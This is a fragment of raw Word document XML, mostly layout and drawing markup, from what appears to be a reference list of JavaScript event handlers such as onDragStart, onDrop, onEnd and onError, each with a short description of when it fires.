          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(e.g.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>file)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>onto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:ind w:left="1673" w:hanging="148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883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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1057" name="Group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6205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1058" name="Freeform 1060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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 105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11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onDragStart()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8" o:spid="_x0000_s1374" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:58.35pt;height:9.15pt;z-index:-17627648;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="116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">
                <v:shape id="Freeform 1060" o:spid="_x0000_s1375" style="position:absolute;left:1930;top:154;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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fQi8YA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74W+g9hCLqWRG9pS3CihDQQMpYf8PMBi&#10;bW0Ta2Uk2VbePnso9LbLzM58u95m16uJQuw8G3heFqCIa287bgycT/und1AxIVvsPZOBK0XYbu7v&#10;1lhaP/OBpmNqlIRwLNFAm9JQah3rlhzGpR+IRfv1wWGSNTTaBpwl3PV6VRRv2mHH0tDiQLuW6stx&#10;dAZ+dl+5wu85xFxN48v4eD7o68WYxUP+/ACVKKd/8991ZQW/eBVc+UZG0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9fQi8YAAADdAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,336;21,336;18,336;0,315;0,312;0,175;21,154;1146,154;1167,175;1167,315;1149,336;1146,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1059" o:spid="_x0000_s1376" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:116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HnOMQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H/g/hBP2NhMHk7UaRWSDwUBW64OPZ3O2&#10;webSNZl2/70ZDHy7j+/nLVaDa8WF+mA9a5hOFAjiyhvLtYZ9+f70CiJEZIOtZ9LwSwFWy9HDAnPj&#10;r1zQZRdrkUI45KihibHLpQxVQw7DxHfEiTv53mFMsK+l6fGawl0rn5WaSYeWU0ODHW0aqs67H6dh&#10;feDizX5vj1/FqbBlmSn+nJ21fhwP6zmISEO8i//dHybNVy8Z/H2TTp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R5zj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onDragStart()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(occurs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>starts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>drag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>operation)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252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:spacing w:before="161"/>
        <w:ind w:left="1252" w:hanging="1063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934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471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1054" name="Group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167"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1055" name="Freeform 1057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349 167"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 349 167"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 349 167"/>
                              <a:gd name="T11" fmla="*/ 349 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 328 167"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 325 167"/>
                              <a:gd name="T19" fmla="*/ 325 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 188 167"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 167 167"/>
                              <a:gd name="T27" fmla="*/ 167 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 167 167"/>
                              <a:gd name="T31" fmla="*/ 167 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 188 167"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 328 167"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 349 167"/>
                              <a:gd name="T43" fmla="*/ 349 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 349 167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Text Box 105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onDrop()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5" o:spid="_x0000_s1377" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.35pt;width:37.1pt;height:9.15pt;z-index:-17627136;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,167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">
                <v:shape id="Freeform 1057" o:spid="_x0000_s1378" style="position:absolute;left:1930;top:167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5B/MIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP24rCMBB9F/yHMAu+yJooKNo1igiiLsKy1Q8Ymtm2&#10;2ExKE2v9eyMs+DaHc53lurOVaKnxpWMN45ECQZw5U3Ku4XLefc5B+IBssHJMGh7kYb3q95aYGHfn&#10;X2rTkIsYwj5BDUUIdSKlzwqy6EeuJo7cn2sshgibXJoG7zHcVnKi1ExaLDk2FFjTtqDsmt6shv3x&#10;VPnuggd7xsX4++eqTu1QaT346DZfIAJ14S3+dx9MnK+mU3h9E0+Qq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fkH8wgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,349;21,349;18,349;0,328;0,325;0,188;21,167;720,167;741,188;741,328;723,349;720,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1056" o:spid="_x0000_s1379" type="#_x0000_t202" style="position:absolute;left:1930;top:167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5zSsMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERP32vCMBB+H+x/CCfsbSYOVlw1iowNhIFYu4c9ns3Z&#10;BptL10Tt/nsjCHu7j+/nzZeDa8WZ+mA9a5iMFQjiyhvLtYbv8vN5CiJEZIOtZ9LwRwGWi8eHOebG&#10;X7ig8y7WIoVwyFFDE2OXSxmqhhyGse+IE3fwvcOYYF9L0+MlhbtWviiVSYeWU0ODHb03VB13J6dh&#10;9cPFh/3d7LfFobBl+ab4Kztq/TQaVjMQkYb4L7671ybNV68Z3L5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5zS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onDrop()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8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>drops</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(e.g.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>file)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>onto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>window)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167"/>
          <w:tab w:val="left" w:pos="1168"/>
        </w:tabs>
        <w:ind w:left="1167" w:hanging="978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8985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417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1051" name="Group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1930" y="154"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1052" name="Freeform 1054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657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2565 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2565 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2586 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2586 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2568 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2565 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 657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35" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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Text Box 105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onEnd()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2" o:spid="_x0000_s1380" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:32.85pt;height:9.15pt;z-index:-17626624;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 1054" o:spid="_x0000_s1381" style="position:absolute;left:1930;top:154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owMIA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZQRvZteAVlNXEaGg2B6MFnocstMk&#10;mJ0N2a3Gf98tFLzN433OatPbRtyo87VjDdNEgSAunKm51HA5v00WIHxANtg4Jg0P8rBZDwcrzIy7&#10;84lueShFDGGfoYYqhDaT0hcVWfSJa4kj9+06iyHCrpSmw3sMt41MlZpLizXHhgpb2lVUXPMfqyHk&#10;i0+V+sKWqN798SM9Hr6WL1qPR/32FUSgPjzF/+69ifPVLIW/b+IJ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SejAwgAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m635,182r-614,l18,182,,161r,-3l,21,21,,635,r21,21l656,161r-18,21l635,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,336;21,336;18,336;0,315;0,312;0,175;21,154;635,154;656,175;656,315;638,336;635,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1053" o:spid="_x0000_s1382" type="#_x0000_t202" style="position:absolute;left:1930;top:154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Q0sQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYQq91aSWSrs1ioiCUJCu20OP0824&#10;G9xM1k3U9d8boeBtHu9zJrPeNeJEXbCeNbwMFQji0hvLlYafYvX8DiJEZIONZ9JwoQCz6eBhgpnx&#10;Z87ptI2VSCEcMtRQx9hmUoayJodh6FvixO185zAm2FXSdHhO4a6RI6XG0qHl1FBjS4uayv326DTM&#10;fzlf2sPm7zvf5bYoPhR/jfdaPz32808Qkfp4F/+71ybNV2+vcPsmnS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50NL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onEnd()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(the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>onEnd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>when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timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>ends.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336"/>
          <w:tab w:val="left" w:pos="1337"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1336" w:hanging="1147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036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525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1048" name="Group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166"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1049" name="Freeform 1051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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827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Text Box 105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onError()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9" o:spid="_x0000_s1383" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:41.35pt;height:9.15pt;z-index:-17626112;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 1051" o:spid="_x0000_s1384" style="position:absolute;left:1930;top:166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Nsk8UA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxR6kboxiDQxG2ksYg9etCIeh+w0&#10;CWZnQ3abpP++Wyj0No/3Odl2Mq0YqHeNZQXLRQSCuLS64UrB5WP//ALCeWSNrWVS8E0OtvnDLMNU&#10;25FPNJx9JUIIuxQV1N53qZSurMmgW9iOOHCftjfoA+wrqXscQ7hpZRxFa2mw4dBQY0e7msr7+cso&#10;OBZvVbK/HvxNxpdkfr8VqMuTUk+P0+sGhKfJ/4v/3O86zI9WCfx+E06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g2yTxQAAAN0AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,348;21,348;18,348;0,327;0,324;0,187;21,166;805,166;826,187;826,327;809,348;805,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1050" o:spid="_x0000_s1385" type="#_x0000_t202" style="position:absolute;left:1930;top:166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tOpcYA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUsDMRCF70L/Q5iCN5tUsNi1aSlFQRDE7fbQ47iZ&#10;7oZuJusmtuu/dw6Ctxnem/e+WW3G0KkLDclHtjCfGVDEdXSeGwuH6uXuEVTKyA67yGThhxJs1pOb&#10;FRYuXrmkyz43SkI4FWihzbkvtE51SwHTLPbEop3iEDDLOjTaDXiV8NDpe2MWOqBnaWixp11L9Xn/&#10;HSxsj1w++6/3z4/yVPqqWhp+W5ytvZ2O2ydQmcb8b/67fnWCbx6EX76REf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tOpc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onError()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  <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(loading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of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a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document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or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image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causes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an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error)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842"/>
          <w:tab w:val="left" w:pos="1843"/>
        </w:tabs>
        <w:spacing w:line="333" w:lineRule="auto"/>
        <w:ind w:left="464" w:right="487" w:hanging="27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088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848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1045" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1046" name="Freeform 1048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1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
